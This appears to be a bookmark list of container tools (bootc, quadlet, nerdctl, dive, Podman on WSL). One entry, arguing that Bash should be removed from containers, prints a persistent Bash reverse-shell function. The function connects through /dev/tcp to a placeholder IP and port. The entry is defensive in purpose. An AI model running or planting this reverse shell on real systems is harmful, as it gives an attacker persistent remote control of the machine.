94 private links
Support for bootable OS containers (bootc) and generating disk images - containers/podman-desktop-extension-bootc
A relatively obscure desktop Linux project hints at a containerized OS future that makes perfect sense for enterprise computing.
Contribute to containers/quadlet development by creating an account on GitHub.
container-diff: Diff your Docker containers. Contribute to GoogleContainerTools/container-diff development by creating an account on GitHub.
Lange Zeit war Docker das Standard-Tool zum Erstellen und Betreiben von Containern.
contaiNERD CTL - Docker-compatible CLI for containerd, with support for Compose, Rootless, eStargz, OCIcrypt, IPFS, ... - GitHub - containerd/nerdctl: contaiNERD CTL - Docker-compatible CLI for containerd, with support for Compose, Rootless, eStargz, OCIcrypt, IPFS, ...
In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view…
While running a Docker container recently I wanted to view the contents of each layer that made up the image. TLDR; Layers of a Docker image are essentially just files generated from running some…
Dive is a tool to explore a docker image, layer contents and discover ways to shrink the size of your... Tagged with docker, ci, kubernetes, devops.
A tool for exploring each layer in a docker image. Contribute to wagoodman/dive development by creating an account on GitHub.
A repo to automatically generates and keep updated a series of Docker images through GitHub Actions. - GitHub - cybersecsi/RAUDI: A repo to automatically generates and keep updated a series of Docker images through GitHub Actions.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh, which doesn’t include this oft-abused feature:
revshell() {
local TARGET_IP="${1:-123.123.123.123}";
local TARGET_PORT="${2:-1234}";
while :; do
nohup bash -i &> \
/dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
sleep 1;
done
}
Want to run Podman on Windows 10? You can, thanks to the latest Windows Subsystem for Linux (WSL) 2.0 implementation.
Android in a Box
My personal hacklab, create your own. Contribute to johackim/docker-hacklab development by creating an account on GitHub.